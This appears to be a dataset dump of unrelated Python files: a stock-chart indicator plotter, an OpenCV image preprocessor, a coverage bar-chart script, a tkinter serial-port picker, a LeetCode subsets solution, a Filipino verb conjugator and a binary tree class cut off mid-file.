signal='signalxTrade_StackEMA') :\n\n # taplots = []\n # taplots +=\n # Lets start with a simple chart\n\n # mpfdf = df[-500:-450]\n mpfdf = df[start:end]\n\n apsq = []\n\n #### >>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD Indicators (Panel 0) ####################################\n\n\n 
markersize = 2 if len(mpfdf) > 50 else 5\n apsq = [\n # EMA42 ref\n mpf.make_addplot(mpfdf['EMA_42'], type = \"scatter\", color='skyblue', markersize=markersize), # 1D 21 EMA uses panel 0 by default\n\n # EMA21 ref\n mpf.make_addplot(mpfdf['EMA_21'], type = \"scatter\", color='blue', markersize=markersize), # uses panel 0 by default\n # mpf.make_addplot(mpfdf['EMA_21HA'], color='blue'), # uses panel 0 by default\n ]\n\n # # if PSAR enabled : draw lines\n # apsq += [\n # # psar\n # mpf.make_addplot(mpfdf['PSARl_0.02_0.2'], color='pink', markersize=markersize, width=1), # uses panel 0 by default\n # mpf.make_addplot(mpfdf['PSARs_0.02_0.2'], color='orange', markersize=markersize, width=1), # uses panel 0 by default\n # ]\n\n # # if PSAR enabled : draw lines\n # apsq += [\n # # psar\n # mpf.make_addplot(mpfdf['SAR'], type = \"scatter\", color='pink', markersize=markersize, width=1), # uses panel 0 by default\n # ]\n\n # # if Chandelier Ex enabled : draw lines\n # apsq += [\n # # chandelier Exit\n # mpf.make_addplot(mpfdf['chxLong'], color='green', markersize=markersize, width=1), # uses panel 0 by default\n # mpf.make_addplot(mpfdf['chxShort'], color='red', markersize=markersize, width=1), # uses panel 0 by default\n # ]\n\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD signal if addSignal = True (Panel 0) ############### >>>>>>>>>>>>>>>>>>>>>>>\n\n longEntry = long_signal_entry(mpfdf[signal], mpfdf)\n longExit = long_signal_exit(mpfdf[signal], mpfdf)\n\n # print ('Long Entry : ', longEntry)\n # print ('Long Exit : ', longExit)\n\n if ( longEntry and longExit) :\n apsq += [\n # add long entry\n mpf.make_addplot(longEntry ,type='scatter', color='purple', markersize=40, marker='^'),\n # add long exit\n mpf.make_addplot( longExit ,type='scatter', color='black', markersize=40, marker='x')\n ]\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD STOPS (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n # todo\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD SR levels (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n # todo\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD TRADE SESSIONS (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD Reversal indicator (Panel 0) >>>>>>>>>>>>>>>>>>>>>>>>>>\n d, markercolor = get_reversals(mpfdf['signal_rPSAR'], mpfdf)\n # print (len(d), len(mpfdf['signal_rPSAR']), len(mpfdf['signal_rPSAR']))\n # print (d)\n # print (markercolor)\n # print (mpfdf['signal_rPSAR'].tolist())\n if d : # check has values\n # mymarkers = d.ReturnMarker.tolist()\n apsq += [\n # add texts using markers to annotate\n # mpf.make_addplot( d, type='scatter',marker='o',markersize=5,color='black')\n mpf.make_addplot( d, type='scatter',marker='o',markersize=5,color=markercolor)\n ]\n\n # add sessions if addsession = True\n # seq_of_points=[('2021-03-22',25),('2021-03-29',25)] # test\n seq_of_points, seq_colors, seq_Returns = get_sessions_long(analysisDF, mpfdf) # draw session lines\n # mpf.plot(df,alines=dict(alines=seq_of_points)) # test\n # print ('Trade Area', seq_of_points)\n\n d = seq_Returns\n if not d.ReturnPlaceholder.isnull().values.all() :\n mymarkers = d.ReturnMarker.tolist()\n apsq += [\n # add texts using markers to annotate\n mpf.make_addplot( d.ReturnPlaceholder, type='scatter',marker=mymarkers,markersize=200,color='pink')\n ]\n # mpfchart[\"plot_ratios\"] += common_plot_ratio # Required to add a new Panel\n\n\n\n ######################### Squeeze plots (Panel 1) default #############################\n\n # make same as TOS colors # order is important\n data = []\n alpha = []\n for i in 
[-3, -4, -2, -1, 4, 5 ] : # maintain order\n d = mpfdf[squeezes.columns[i]]\n # if np.isnan(np.sum(np.asarray(d))) :\n if d.isnull().values.all() :\n d = d.fillna(0)\n print (\"All Null/NAN : \", squeezes.columns[i])\n alpha += [0.0] # make invisible\n print (squeezes.columns[i], 'modified')\n else :\n alpha += [0.3]\n\n # alpha += [0.5]\n data += [d]\n # print (d)\n # print (\"isnull\", squeezes.columns[i], d.isnull().values.all())\n\n # set ylim\n ylim = (min(mpfdf[squeezes.columns].min())*1.02, max(mpfdf[squeezes.columns].max()*1.02))\n\n apsq += [\n # Note order is important here\n mpf.make_addplot(data[0], secondary_y=False, type=\"bar\", color=\"blue\", alpha=alpha[0], panel=1, ylim=ylim),\n mpf.make_addplot(data[1], secondary_y=False, type=\"bar\", color=\"deepskyblue\", alpha=alpha[1], panel=1, ylim=ylim),\n mpf.make_addplot(data[2], secondary_y=False, type=\"bar\", color=\"red\", alpha=alpha[2], panel=1, ylim=ylim),\n mpf.make_addplot(data[3], secondary_y=False, type=\"bar\", color=\"yellow\", alpha=alpha[3], panel=1, ylim=ylim),\n\n # mpf.make_addplot(mpfdf['close'], color=\"black\", panel=1),\n mpf.make_addplot(data[4], secondary_y=False, color=\"green\",alpha=alpha[4], panel=1, ylim=ylim, width=2),\n mpf.make_addplot(data[5], secondary_y=False, color=\"red\", alpha=alpha[5], panel=1, ylim=ylim, width=2)\n ]\n\n\n # squeeze metrics original flavor\n d = mpfdf['SQZ_OFF'].apply(lambda x: 0 if x==1 else np.nan)\n if not d.isnull().values.all() :\n # print (d)\n apsq += [mpf.make_addplot(d , secondary_y=False, scatter=True, markersize=20, marker='o',color=\"lime\", panel=1)]\n\n d = mpfdf['SQZ_ON'].apply(lambda x: 0 if x==1 else np.nan)\n if not d.isnull().values.all() :\n # print (d)\n apsq += [mpf.make_addplot(d, secondary_y=False, scatter=True, markersize=20, marker='o', color=\"red\", panel=1)]\n\n d = mpfdf['squeeze_on'].apply(lambda x: 0 if x==1 else np.nan)\n if not d.isnull().values.all() :\n # print (d)\n apsq += [mpf.make_addplot(d, secondary_y=False, scatter=True, markersize=2, marker='o', color=\"black\", panel=1)]\n # mpf.make_addplot(mpfdf[squeezes.columns[3]], scatter=True,markersize=20,marker='o',color=\"skyblue\", panel=2),\n\n # mpf.make_addplot(mpfdf['squeeze_on'].apply(lambda x: -2 if x==0 else None), scatter=True,markersize=10,marker='o', color=\"black\", panel=1),\n # mpf.make_addplot(mpfdf['squeeze_off'].apply(lambda x: -2 if x==0 else None), scatter=True,markersize=10,marker='o', color=\"lime\", panel=1),\n\n\n # mpf.make_addplot(long_signal_entry(mpfdf[signal], mpfdf.low) ,type='scatter', color='purple', markersize=15, marker='^'),\n # # add long exit\n # mpf.make_addplot(long_signal_exit(mpfdf[signal], mpfdf.high) ,type='scatter', color='magenta', markersize=15, marker='v'),\n\n\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> ADD Algo if addAlgo=True (Panel 2) >>>>>>>>>>>>>>>>>>>>>>>>>>\n\n # All scatter plot in a single line\n signalCols = sorted ([col for col in mpfdf if col.startswith('signal')])\n signalDF = mpfdf[signalCols]\n ylimSignal = len(signalCols)*0.5+1 # add bottom and top row for buffer to view markers\n counter = 0.5\n\n # add base at 0\n apsq += [mpf.make_addplot(mpfdf[signalCols[0]].apply(lambda x:0), scatter=True, alpha=0, panel=2, secondary_y=False, ylim=(0,ylimSignal), ylabel='Signals')]\n\n # define markersize\n l = len(mpfdf)\n markersize = 5 if l > 150 else 20\n for col in signalCols :\n d = mpfdf[col].copy()\n if not d.isnull().values.all() : # check if a null array\n # print (d)\n\n # IF signalxtrade indicator\n if 
(col.startswith('signalxTrade')) :\n mymarkercolor = d.apply(\n lambda x: 'purple' if x==1 else ('red' if x==-1 else\n 'yellow' if (x==-2 or x==2) else 'lightgray')).tolist()\n mymarker = d.apply(\n lambda x: '^' if x==1 else ('x' if x==-1 else\n 'o' if (x==-2 or x==2) else 'None')).tolist()\n mydata = d.apply( lambda x: counter )\n apsq += [mpf.make_addplot(mydata, scatter=True, markersize=markersize, marker=mymarker, color=mymarkercolor, panel=2, secondary_y=False, ylim=(0,ylimSignal))]\n\n\n # IF only signal indicator\n else:\n mymarkercolor = d.apply(\n lambda x: 'limegreen' if x==1 else ('red' if x==-1\n else 'yellow' if (x==-2 or x==2)\n else ( 'black' if x ==-8\n else ( 'green' if x== 9\n else ('red' if x == -9\n else 'lightgray'))))).tolist()\n mydata = d.apply( lambda x: counter )\n apsq += [mpf.make_addplot(mydata, scatter=True, markersize=markersize, marker='o', color=mymarkercolor, panel=2, secondary_y=False, ylim=(0,ylimSignal))]\n # print (mydata) # test\n # print (mymarkercolor) # test\n\n counter +=0.5\n\n\n\n # # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> Show HA is HA = True\n final_df = mpfdf # placeholder\n\n if ha :\n # If HA HeikinAski Charts Enabled ; else remove section\n ## Generate the HA columns and rename to OHLC\n final_df = mpfdf[['HA_open', 'HA_high', 'HA_low', 'HA_close']].copy()\n final_df.columns = ['open', 'high', 'low', 'close']\n # mpf.plot(df2, type='candle', style='yahoo')\n\n\n import matplotlib.dates as mdates\n import matplotlib.ticker as mticker\n from matplotlib.ticker import AutoLocator, MultipleLocator\n\n # fig.tight_layout(h_pad= -1.6)\n\n # fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False,panel_ratios=(6,2), datetime_format=' %m/%d',xrotation=45, returnfig=True)\n\n\n # fig, axlist = mpf.plot(final_df, type=ctype, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo',datetime_format=' %b-%d',xrotation=90, returnfig=True, alines=dict(alines=seq_of_points))\n\n # mpf.plot(final_df, type=ctype,addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo',)\n\n # fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False, panel_ratios=(6,2), datetime_format=' %b-%d',xrotation=90, returnfig=True, alines=dict(alines=seq_of_points, colors=seq_colors, linewidths=2,))\n\n # yrange = max(mpfdf['high']) - min(mpfdf['low'])\n # offset = yrange * 0.02 # 2% of range\n\n # fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False, panel_ratios=(6,2), datetime_format=' %b-%d',xrotation=90, returnfig=True, )\n ## tight_layout=Truex, ylim = ( min(mpfdf['low'] - + yrange * 0.1), max(mpfdf['high']) + yrange * 0.1)\n\n # Add Algo Panel # if addAlgo=True\n fig, axlist = mpf.plot(final_df, type=ctype, addplot=apsq, figscale=1, figratio=(15,8),title= symbol+'\\nTTM-Squeeze: '+ interval, style='yahoo', volume=False, panel_ratios=(6,2,4), datetime_format=' %b-%d',xrotation=90, returnfig=True, alines=dict(alines=seq_of_points, colors=seq_colors, linewidths=2,))\n\n\n\n # print (axlist)\n ax1 = axlist[1] # Panel 0\n # ax1.set_ylim( max(mpfdf['high']) + yrange * 0.1, min(mpfdf['low'] - + yrange * 0.1))\n ax2 = axlist[2] # Panel 2\n\n ##>>>>>>>>>>>>>>> Ytick Markers for Algo Names 
#########################\n ax3 = axlist[-2] # Panel 1\n counter = 0.5\n yticks = list(np.arange (0.5, 0.5*(1+len(signalCols)), 0.5))\n # signalCols # replace prefix signal_ - clean look\n signalCols_n = [sub.replace('signalx', '') for sub in signalCols]\n signalCols_n = [sub.replace('signal_', '') for sub in signalCols_n]\n print (len(yticks), len(signalCols))\n # axs = for i in axlist i.ylable=\"signal\"\n ax3.set_yticks(yticks)\n ax3.set_yticklabels(signalCols_n, fontdict={'fontsize': 8})\n\n\n # for col in signalCols :\n # ax3.text(y=counter, x=ax3.get_xlim()[0]*0.9, s=col, alpha=0.7, color='b')\n # counter += 0.5\n\n\n\n # ax2.set_ylim(min(mpfdf[squeezes.columns].min()), max(mpfdf[squeezes.columns].max()))\n ax1.minorticks_on()\n ax1.tick_params(axis='x',which='minor',direction='out',color='b',labelsize=3,labelcolor='g')\n ax1.xaxis.set_minor_locator(MultipleLocator(1))\n # if (len(mpfdf) <=50) :\n # ax1.xaxis.set_major_locator(MultipleLocator(2))\n # elif (len(mpfdf) <=100):\n # ax1.xaxis.set_major_locator(MultipleLocator(3))\n\n\n # plt.rcParams['xtick.major.size'] = 8\n # plt.rcParams['xtick.minor.size'] = 4\n # plt.rcParams['xtick.label.size'] = 4\n # ax1.tick_params(axis='x', which='both',labelbottom= False, labeltop=False )\n # ax1.tick_params(axis='x', which='minor', pad = 2)\n # ax1.grid(which='major',color='k')\n # ax1.grid(which='minor',color='gray')\n\n # base = len(final_df)\n\n # ax1.xaxis.set_major_formatter(mdates.DateFormatter('%b'))\n # # ax1.xaxis.set_major_locator(mticker.IndexLocator(base=base/10, offset=0))\n # ax1.xaxis.set_minor_formatter(mdates.DateFormatter('%d'))\n # ax1.xaxis.set_minor_locator(AutoMinorLocator())\n\n # mpf.plot(mpfdf, type='candle', figscale=1, style='blueskies')\n plt.show()\n # print (df[-1:][['open', 'high', 'low', 'close']])\n\n# plot (df, start=-150, end=-50, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-200, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-50, ctype='ohlc')\n# plot (df, start=-10, ctype='candle', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-220, end=-150, ctype='candle', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-450, end=-325, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\nplot (df, start=-75, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-200, ctype='ohlc', ha=True, signal='signalxTrade_StackEMA')\n# plot (df, start=-450, end=-300, ctype='ohlc', ha=False)\n\nprint (df[-1:][['open', 'high', 'low', 'close']])\n# yf.Ticker(symbol).get\n","sub_path":"algo_engine/TTM_Sq_Chart_HA_working.py","file_name":"TTM_Sq_Chart_HA_working.py","file_ext":"py","file_size_in_byte":27860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"36394613","text":"import cv2\nimport numpy as np\nimport math\nimport os\n\nshow_Image = False\n\ndata_path = r\"../1124_train_photo\"\ntarget_path = \"%s_preprocessed\" % data_path\n \n\ndef panelAbstract(srcImage):\n # read pic shape\n imgHeight, imgWidth = srcImage.shape[:2]\n imgHeight = int(imgHeight)\n imgWidth = int(imgWidth)\n # 二維轉一維\n imgVec = np.float32(srcImage.reshape((-1, 3)))\n criteria = (cv2.TERM_CRITERIA_EPS + cv2.TERM_CRITERIA_MAX_ITER, 10, 1.0)\n flags = cv2.KMEANS_RANDOM_CENTERS\n ret, label, clusCenter = cv2.kmeans(imgVec, 2, None, criteria, 10, flags)\n clusCenter = np.uint8(clusCenter)\n clusResult = clusCenter[label.flatten()]\n imgres = clusResult.reshape(srcImage.shape)\n # image轉成灰階\n imgres = 
cv2.cvtColor(imgres, cv2.COLOR_BGR2GRAY)\n\n cv2.imwrite(\"test.jpg\", imgres)\n # convert the image to 2-D and apply a binary threshold\n _, thresh = cv2.threshold(imgres, 127, 255, cv2.THRESH_BINARY_INV)\n\n threshRotate = cv2.merge([thresh, thresh, thresh])\n # write out the thresholded image\n # if cv2.imwrite(r\"./Photo/thresh.jpg\", threshRotate):\n # print(\"Write Images Successfully\")\n # determine the bounding rectangle of the foreground\n # find contours\n _, contours, hierarchy = cv2.findContours(thresh, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n minvalx = np.max([imgHeight, imgWidth])\n maxvalx = 0\n minvaly = np.max([imgHeight, imgWidth])\n maxvaly = 0\n maxconArea = 0\n maxAreaPos = -1\n for i in range(len(contours)):\n if maxconArea < cv2.contourArea(contours[i]):\n maxconArea = cv2.contourArea(contours[i])\n maxAreaPos = i\n\n print(\"Contours:\", len(contours))\n\n if len(contours) > maxAreaPos:\n objCont = contours[maxAreaPos]\n else:\n print(\"Error: abnormal contours\")\n return None # return error code\n\n # cv2.minAreaRect generates the minimum-area bounding rectangle\n rect = cv2.minAreaRect(objCont)\n for j in range(len(objCont)):\n minvaly = np.min([minvaly, objCont[j][0][0]])\n maxvaly = np.max([maxvaly, objCont[j][0][0]])\n minvalx = np.min([minvalx, objCont[j][0][1]])\n maxvalx = np.max([maxvalx, objCont[j][0][1]])\n if rect[2] <= -45:\n rotAgl = 90 + rect[2]\n else:\n # the coffee-powder images take this else branch\n rotAgl = rect[2]\n if rotAgl == 0:\n panelImg = srcImage[minvalx:maxvalx, minvaly:maxvaly, :]\n else:\n # the coffee-powder images take this else branch\n\n _, dstRotBW = cv2.threshold(thresh, 127, 255, 0)\n # print the minimum bounding rectangle\n\n _, contours, hierarchy = cv2.findContours(dstRotBW, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n maxcntArea = 0\n maxAreaPos = -1\n for i in range(len(contours)):\n if maxcntArea < cv2.contourArea(contours[i]):\n maxcntArea = cv2.contourArea(contours[i])\n maxAreaPos = i\n x, y, w, h = cv2.boundingRect(contours[maxAreaPos])\n # x, y are the coordinates of the rectangle's top-left corner; w, h are its width and height\n # umsize means: 1 pixel * umsize = real-world size\n umsize = 90000 / w\n # print(umsize)\n w = w / 8 # split the width into 8 equal parts\n\n # store the coffee powder without its outer contour into panelImg; the photo size is fixed, so w is used in place of h\n panelImg = srcImage[int(y + 2 * w):int(y + 6 * w), int(x + w):int(x + 7 * w), :]\n # print the real-world image size\n print(\"Image Size:\", 4 * w * umsize, \" um * \", 6 * w * umsize, \" um\")\n return panelImg\n\n\ndef hist_equal_lab(img):\n global show_Image\n\n # Converting image 
to LAB Color model\n lab = cv2.cvtColor(img, cv2.COLOR_BGR2LAB)\n\n # Splitting the LAB image to different channels\n l, a, b = cv2.split(lab)\n if show_Image:\n cv2.namedWindow('l_channel', cv2.WINDOW_NORMAL)\n cv2.imshow('l_channel', l)\n cv2.namedWindow(\"a_channel\", cv2.WINDOW_NORMAL)\n cv2.imshow('a_channel', a)\n cv2.namedWindow(\"b_channel\", cv2.WINDOW_NORMAL)\n cv2.imshow('b_channel', b)\n\n # Applying CLAHE to L-channel\n clahe = cv2.createCLAHE(clipLimit=3.0, tileGridSize=(8, 8))\n cl = clahe.apply(l)\n\n return cl\n\n\nif __name__ == \"__main__\":\n\n if not os.path.exists(target_path):\n os.mkdir(target_path)\n\n print(\"Target Path: \", target_path) \n \n error_files = []\n \n\n for root_Outer, dirs_Outer, files_Outer in os.walk(data_path, topdown=False):\n for directory in dirs_Outer:\n target_dir = os.path.join(target_path, directory)\n\n if not os.path.exists(target_dir):\n os.mkdir(target_dir)\n\n print(\"Target Dir: \", target_dir)\n\n for root, dirs, files in os.walk(os.path.join(root_Outer, directory), topdown=False):\n for name in files:\n img_path = os.path.join(root, name)\n srcImage = cv2.imread(img_path)\n\n (h, w) = srcImage.shape[:2]\n\n center = (w/2, h/2)\n\n for i in range(4):\n rotation_matrix = cv2.getRotationMatrix2D(center, i*90, 1.0)\n rstImage = cv2.warpAffine(srcImage, rotation_matrix, (w, h))\n\n rstImage = panelAbstract(rstImage)\n\n if rstImage is None:\n error_files.append(img_path)\n break\n\n print(rstImage.shape)\n\n rstImage = cv2.resize(rstImage, (1600, 1066), interpolation=cv2.INTER_LINEAR)\n print(rstImage.shape)\n\n rstImage = hist_equal_lab(rstImage)\n\n # 印出結果\n filename = '%s_result_%d.%s' % (name.split('.')[0], i, name.split('.')[-1])\n print('new_Filename: ' + filename)\n print(\"Save in path: \", os.path.join(target_dir, filename))\n if cv2.imwrite(os.path.join(target_dir, filename), rstImage):\n print(\"Write Images Successfully\") \n print(\"Error Files:\", error_files)\n","sub_path":"preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":6049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"641546220","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport sys\r\n\r\nargs = sys.argv\r\nsamplename = args[1]\r\nfilename = args[2]\r\noutPath = args[3]\r\n\r\ndf = pd.read_csv(filename, sep='\\t', header=None)\r\ndf = df.loc[(df[4] < 100)]\r\ndf = df.sort_values(4, ascending=False)\r\n\r\nfig, ax = plt.subplots(figsize=(20,10))\r\nfig.suptitle(f\"Less than 100X coverage regions for {samplename} Myeloid smMIPS assay\", fontsize=20, fontweight='bold')\r\nax.bar(df[3],df[4])\r\nax.set_xticklabels(df[3], rotation=90, horizontalalignment='right',fontsize='12')\r\nax.set_title(f'Number_of_MIPS ={df.shape[0]}')\r\nax.set_ylabel('Coverage')\r\nplt.savefig(f'{outPath}/{samplename}.Low_Coverage.png', bbox_inches='tight')","sub_path":"scripts/coverageplot.py","file_name":"coverageplot.py","file_ext":"py","file_size_in_byte":686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"272140633","text":"from tkinter import *\nfrom Port_connect import serial_ports\n\nimport sys \n\nsys_mac = False\nsys_win = False\nsys_linux = False\nif sys.platform.startswith('darwin'):\n from tkmacosx import Button\n sys_mac = True\n\nif sys.platform.startswith('win'):\n sys_win = True\n\nif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n sys_linux = True\n\n\nsys_mac = False\nsys_win = 
False\nsys_linux = False\nif sys.platform.startswith('darwin'):\n from tkmacosx import Button\n sys_mac = True\n\nif sys.platform.startswith('win'):\n sys_win = True\n\nif sys.platform.startswith('linux') or sys.platform.startswith('cygwin'):\n sys_linux = True\n\npuerto = []\nsend_port = None\n\n\ncontent_size_font = 12\n\n\ndef from_rgb(rgb):\n \"\"\"translates an rgb tuple of int to a tkinter friendly color code\n \"\"\"\n return \"#%02x%02x%02x\" % rgb \n\n\n\ndef connect(lst_box_puertos, root):\n global send_port\n try:\n port = lst_box_puertos.curselection()\n port = lst_box_puertos.get(port)\n send_port = port\n root.destroy()\n except:\n pass\n\ndef update(lst_box_puertos):\n lst_box_puertos.delete(0,\"end\")\n puerto = serial_ports()\n for i in puerto :\n print(\"puerto disponibles : \" + i)\n lst_box_puertos.insert(1,i) \n lst_box_puertos.config(font = (\"\",content_size_font))\n lst_box_puertos.pack()\n\ndef cerrar_w(root):\n global send_port\n send_port = \"cerrar\"\n root.destroy()\n \n\n\ndef w_select_port():\n global sys_linux\n global sys_mac\n global sys_win\n\n if sys_mac:\n # style variables\n title_size_font = 16\n content_size_font = 12\n color_theme = \"snow\"\n color_button = \"deepskyblue3\"\n color_text_button = \"gray99\"\n font = \"Garuda\"\n if sys_linux or sys_win:\n # style variables\n title_size_font = 16\n content_size_font = 12\n color_theme = \"snow\"\n color_button = \"deepskyblue3\"\n color_text_button = \"gray99\"\n font = \"Garuda\"\n color_font_activate_button = \"gray25\"\n color_bg_activate_button = \"deep sky Blue\"\n\n \n root = Tk()\n root.title(\"Colibri 3D\")\n if sys_mac or sys_win:\n root.iconbitmap(\"icon.ico\")\n root.minsize(400, 150 )\n root.config(bg = color_theme)\n root.protocol(\"WM_DELETE_WINDOW\", lambda : cerrar_w(root)) # action when the window is closed \n \n\n\n # Prepare the ports \n puerto = serial_ports()\n #print(\"Puerto :\" + str(puerto))\n\n # prepare the listbox for selecting the port \n Label(text = \"Selecciona el puerto donde esta conectada la impresora\", bg = color_theme, \n font = (font, content_size_font)).pack(pady = 15, padx = 15)\n \n lst_box_puertos = Listbox(root)\n for i in puerto :\n print(\"puerto disponibles : \" + i)\n lst_box_puertos.insert(1,i) \n lst_box_puertos.config(font = (\"\",content_size_font))\n lst_box_puertos.pack()\n\n # graphical interface\n btn_connect = Button(text =\"Conectar\", command = lambda : connect(lst_box_puertos, root), )\n btn_connect.config(bg = color_button, fg = color_text_button ,font =(font,content_size_font))\n if sys_win or sys_linux:\n btn_connect.config( activebackground = color_bg_activate_button, activeforeground =color_font_activate_button, font = (font,content_size_font))\n btn_connect.pack(padx = 15, pady = 10)\n\n btn_update = Button(text =\"Actualizar\", command = lambda : update(lst_box_puertos) )\n btn_update.config(bg = color_button, fg = color_text_button ,font =(font,content_size_font))\n if sys_linux or sys_win:\n btn_update.config( activebackground = color_bg_activate_button, activeforeground =color_font_activate_button, font = (font,content_size_font))\n btn_update.pack(padx = 15, pady = 10)\n\n\n root.mainloop()\n\n\ndef run_select_port():\n w_select_port()\n return send_port\n\nif __name__ == \"__main__\":\n run_select_port()","sub_path":"Select_port.py","file_name":"Select_port.py","file_ext":"py","file_size_in_byte":3974,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} 
+{"seq_id":"531405967","text":"# Time Complexity : O(2^n * n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : No\n\n# Problem Approach\n# 1. Suppose len of nums is 3 ([1,2,3])\n# 2. The binary represenation with max len 3 range from(000 to 111)\n# Dec Bin Subset\n# 0 000 []\n# 1 001 [3]\n# 2 010 [2] \n# 3 011 [2,3]\n# 4 100 [1]\n# 5 101 [1,3]\n# 6 110 [1,2]\n# 7 111 [1,2.3]\nclass Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n nums_len = len(nums)\n n = 2 ** nums_len\n res = []\n for i in range(n):\n bin_i = format(i, '#0'+str(nums_len+2)+'b').replace(\"0b\",\"\") # get the binary equivalent in the form of list\n curr = []\n for index, val in enumerate(bin_i):\n if \"1\" == val:\n curr.append(nums[index]) # traverse the binary equivalent and add to curr list if there is 1 at bin index\n res.append(curr)\n return res","sub_path":"78_Subsets_Binary_Num_Mapping.py","file_name":"78_Subsets_Binary_Num_Mapping.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"95331298","text":"vowels = {'a','e','i','o','u','A','E','I','O','U'}\n\ndef getSimuno(subj):\n if subj == \"I\": return \"ko\"\n elif subj == \"You\": return \"mo\"\n elif subj == \"He\": return \"niya\"\n elif subj == \"She\": return \"niya\"\n elif subj == \"We\": return \"natin\"\n elif subj == \"They\":return \"nila\"\n\ndef getFirstVowel(word):\n firstVowel = -1\n for i in range(len(word)):\n if word[i] in vowels:\n firstVowel = i\n break\n return firstVowel\n\ndef getLastVowel(word):\n lastVowel = -1\n for i in range(len(word)):\n if word[i] in vowels:\n lastVowel = i\n return lastVowel\n\ndef repeatFirstSyllable(word):\n firstVowel = getFirstVowel(word)\n return word[:firstVowel+1] + word\n\ndef lastVowelChange(word):\n lastVowel = getLastVowel(word)\n if word[lastVowel] == 'O':\n word = word[:lastVowel] + 'U' + word[lastVowel+1:]\n elif word[lastVowel] == 'o':\n word = word[:lastVowel] + 'u' + word[lastVowel+1:]\n return word\n\ndef addInToEnd(word):\n if word[-1] in vowels:\n return word + 'hin'\n else:\n return word + 'in'\n\ndef addInToFirstVowel(word):\n firstVowel = getFirstVowel(word)\n return word[:firstVowel] + 'in' + word[firstVowel:]\n\ndef getPandiwa(make, verb):\n pandiwa=verb\n\n if (make == \"will\"):\n pandiwa = repeatFirstSyllable(pandiwa)\n pandiwa = lastVowelChange(pandiwa)\n pandiwa = addInToEnd(pandiwa)\n\n elif (make == \"made\"):\n pandiwa = addInToFirstVowel(pandiwa)\n\n elif (make == \"make\" or make == \"makes\"):\n pandiwa = repeatFirstSyllable(pandiwa)\n pandiwa = addInToFirstVowel(pandiwa)\n\n return pandiwa\n\ndef capitalize(word):\n return word[0].capitalize() + word[1:]\n\nwhile(True):\n try: line=input().split()\n except: break\n subj = line[0]\n make = line[1]\n verb = line[2]\n noun = line[4]\n if (make == 'will'):\n verb = line[3]\n noun = line[5]\n \n pandiwa = getPandiwa(make, verb)\n pandiwa = capitalize(pandiwa)\n simuno = getSimuno(subj)\n\n print(pandiwa, simuno, \"ang\", noun)\n\n","sub_path":"HR/Algolympics2015/B.py","file_name":"B.py","file_ext":"py","file_size_in_byte":2084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"362329268","text":"from .node import *\n\nclass BinaryTree(Node):\n def __init__(self, val): \n super().__init__(val, max_child_count=2)\n \n def replace_child(self, cindex, child):\n #overriding Node's replace_child 
method to ensure every nodes has at most one parent.\n assert 0 <= cindex < len(self._children), 'Invalid child index'\n assert isinstance(child, type(self)), f'New child must be a subclasses of {type(self)}'\n if self._children[cindex] is not None:\n # remove current child\n self.remove_child(cindex)\n self._children[cindex] = child\n # this is the main difference between BinaryTreeNode and Node.\n child._parents = [self]\n \n def access(self, idxlst:list):\n nd = self\n try: \n for i in idxlst:\n nd = nd[i]\n except TypeError: \n nd = -1\n return nd\n \n def __repr__(self):\n rep = {} \n def subtree_repr(node, rep, level):\n if level not in rep.keys():\n rep[level] = list()\n if node is None: \n rep[level].append(None)\n return\n \n rep[level].append(Node.__repr__(node)) \n for c in node._children: \n subtree_repr(c, rep, level+1)\n subtree_repr(self, rep, 0)\n if rep[max(rep)].count(None) == len(rep[max(rep)]):\n rep.pop(max(rep))\n return f'{self.__class__.__name__}: ' + repr(rep)\n \n def __str__(self): \n def subtree_str(node): \n if node is None: \n return '_'\n \n val_str = '(' + str(node.value) + '; ' \n for c in node._children:\n val_str += subtree_str(c) + ', '\n val_str = 